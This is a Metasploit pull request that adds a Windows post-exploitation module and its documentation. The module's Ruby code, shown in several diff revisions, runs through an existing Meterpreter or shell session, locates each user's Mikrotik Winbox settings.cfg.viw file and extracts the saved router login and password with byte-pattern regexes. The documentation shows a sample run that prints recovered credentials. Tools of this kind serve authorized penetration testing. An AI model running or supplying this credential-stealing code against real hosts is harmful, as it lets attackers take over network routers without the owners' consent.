### PR TITLE
Add Post Windows Gather to perform Mikrotik Winbox "Keep Password" credentials extraction

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/winbox_settings.md
+++ b/documentation/modules/post/windows/gather/credentials/winbox_settings.md
@@ -1,0 +1,37 @@
+## Vulnerable Application
+
+Any Windows host with a `meterpreter` session and Mikrotik Winbox installed.
+
+Winbox can be downloaded [here](https://mikrotik.com/download)
+
+### Installation Steps
+
+1. Download and open Mikrotik Winbox
+2. Enter a RouterOS device address into `Connect to`, username into `Login`, password into `Password` and check the flag `Keep Password`
+3. Click Connect
+
+## Verification Steps
+
+1. Get a `meterpreter` session on a Windows host.
+2. Do: `run post/windows/gather/credentials/winbox_settings`
+3. If any users in the system has a `Keep Password` enabled in Winbox, the credentials will be printed out.
+
+## Options
+
+### VERBOSE
+
+- By default verbose is turned off. When turned on, the module will show the HexDump of `settings.cfg.viw` files.
+
+## Scenarios
+
+```
+msf6 post(windows/gather/credentials/winbox_settings) > run
+
+[*] VERBOSE: false
+[*] Checking Default Locations...
+[*] C:\Users\Administrator\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw not found ....
+[*] Found File at C:\Users\FooBar\AppData\Roaming\Mikrotik\Winbox\settings.cfg.viw
+[+] Login: ThisIsUsername
+[+] Password: ThisIsPassword
+[*] Post module execution completed
+```

--- a/modules/post/windows/gather/credentials/winbox_settings.rb
+++ b/modules/post/windows/gather/credentials/winbox_settings.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Common
   include Msf::Post::Windows::UserProfiles
 
-  def initialize(info={})
+  def initialize(info = {})
     super(
       update_info(
         info,
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Post
   def check_appdata(path)
     client.fs.file.stat(path)
     print_good("Found File at #{path}")
-  
+
     if datastore['VERBOSE']
       print_hexdump(path)
     end

--- a/modules/post/windows/gather/credentials/winbox_settings.rb
+++ b/modules/post/windows/gather/credentials/winbox_settings.rb
@@ -1,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::Common
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info={})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor',
+        'Description'   => %q{ This module extracts Mikrotik Winbox credentials saved in the
+          "settings.cfg.viw" file when the "Keep Password" option is
+          selected in Winbox.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Pasquale \'sid\' Fiorillo' ], # www.pasqualefiorillo.it - Thanks to: www.isgroup.biz
+        'Platform'      => [ 'win', ],
+        'SessionTypes'  => [ 'meterpreter' ],
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              core_channel_eof
+              core_channel_open
+              core_channel_read
+              core_channel_write
+              stdapi_fs_stat
+            ]
+          }
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptBool.new('VERBOSE', [false, 'HexDump settings.cfg.viw files', false])
+      ]
+    )
+  end
+
+  def run
+    print_status("VERBOSE: #{datastore['VERBOSE']}")
+    print_status('Checking Default Locations...')
+    grab_user_profiles.each do |user|
+      next if user['AppData'].nil?
+
+      check_appdata(user['AppData'] + '\\Mikrotik\\Winbox\\settings.cfg.viw')
+    end
+  end
+
+  def check_appdata(path)
+    client.fs.file.stat(path)
+    print_good("Found File at #{path}")
+  
+    if datastore['VERBOSE']
+      print_hexdump(path)
+    end
+
+    parse(path)
+  rescue StandardError
+    print_status("#{path} not found ....")
+  end
+
+  def print_hexdump(path)
+    file = client.fs.file.new(path, 'rb')
+    while (chunk = file.read(16))
+      hex_values = chunk.each_byte.map { |b| sprintf('%02x', b) }.join(' ')
+      ascii_values = chunk.gsub(/[^[:print:]]/, '.')
+      print_status("#{hex_values.ljust(48)} #{ascii_values}")
+    end
+  rescue EOFError
+  rescue Errno::ENOENT
+    print_error("File not found: #{path}")
+  rescue => e
+    print_error("An error occurred: #{e.message}")
+  end
+
+  def parse(path)
+    file = client.fs.file.new(path, 'rb')
+    buffer = file.read()
+
+    login = buffer.match(/\x00\x05login(.*)\x08\x00/)
+    print_good("Login: #{login[1]}")
+
+    password = buffer.match(/\x00\x03pwd(.*)\x0B\x00/)
+    print_good("Password: #{password[1]}")
+  rescue EOFError
+  rescue Errno::ENOENT
+    print_error("File not found: #{path}")
+  rescue => e
+    print_error("An error occurred: #{e.message}")
+  end
+    
+end

--- a/modules/post/windows/gather/credentials/winbox_settings.rb
+++ b/modules/post/windows/gather/credentials/winbox_settings.rb
@@ -12,15 +12,21 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        'Name'          => 'Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor',
-        'Description'   => %q{ This module extracts Mikrotik Winbox credentials saved in the
+        'Name' => 'Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor',
+        'Description' => %q{
+          This module extracts Mikrotik Winbox credentials saved in the
           "settings.cfg.viw" file when the "Keep Password" option is
           selected in Winbox.
         },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Pasquale \'sid\' Fiorillo' ], # www.pasqualefiorillo.it - Thanks to: www.isgroup.biz
-        'Platform'      => [ 'win', ],
-        'SessionTypes'  => [ 'meterpreter' ],
+        'License' => MSF_LICENSE,
+        'Author' => ['Pasquale \'sid\' Fiorillo'], # www.pasqualefiorillo.it - Thanks to: www.isgroup.biz
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -72,27 +78,25 @@ class MetasploitModule < Msf::Post
       ascii_values = chunk.gsub(/[^[:print:]]/, '.')
       print_status("#{hex_values.ljust(48)} #{ascii_values}")
     end
-  rescue EOFError
   rescue Errno::ENOENT
     print_error("File not found: #{path}")
-  rescue => e
+  rescue StandardError => e
     print_error("An error occurred: #{e.message}")
   end
 
   def parse(path)
     file = client.fs.file.new(path, 'rb')
-    buffer = file.read()
+    buffer = file.read
 
     login = buffer.match(/\x00\x05login(.*)\x08\x00/)
     print_good("Login: #{login[1]}")
 
     password = buffer.match(/\x00\x03pwd(.*)\x0B\x00/)
     print_good("Password: #{password[1]}")
-  rescue EOFError
   rescue Errno::ENOENT
     print_error("File not found: #{path}")
-  rescue => e
+  rescue StandardError => e
     print_error("An error occurred: #{e.message}")
   end
-    
+
 end

--- a/modules/post/windows/gather/credentials/winbox_settings.rb
+++ b/modules/post/windows/gather/credentials/winbox_settings.rb
@@ -40,16 +40,9 @@ class MetasploitModule < Msf::Post
         }
       )
     )
-
-    register_options(
-      [
-        OptBool.new('VERBOSE', [false, 'HexDump settings.cfg.viw files', false])
-      ]
-    )
   end
 
   def run
-    print_status("VERBOSE: #{datastore['VERBOSE']}")
     print_status('Checking Default Locations...')
     grab_user_profiles.each do |user|
       next if user['AppData'].nil?

--- a/modules/post/windows/gather/credentials/winbox_settings.rb
+++ b/modules/post/windows/gather/credentials/winbox_settings.rb
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => ['Pasquale \'sid\' Fiorillo'], # www.pasqualefiorillo.it - Thanks to: www.isgroup.biz
         'Platform' => ['win'],
-        'SessionTypes' => ['meterpreter', 'shell'],
+        'SessionTypes' => ['meterpreter', 'shell', 'powershell'],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],


### PR DESCRIPTION
This pull request introduces a new post module to extracts Mikrotik Winbox credentials saved in the "settings.cfg.viw" file when the "Keep Password" option is selected in Winbox.

## Module Information

- Name: `post/windows/gather/credentials/winbox_settings`
- Targets: Mikrotik Winbox installation in Windows when the "Keep Password" option in selected
- Tested Against: Mikrotik Winbox 3.40 (latest)

## Verification

- Get a `meterpreter` session on a Windows host.
- Do: `run post/windows/gather/credentials/winbox_settings`
-  If any users in the system has a `Keep Password` enabled in Winbox, the credentials will be printed out.

## Documentation Addition

I have included comprehensive documentation.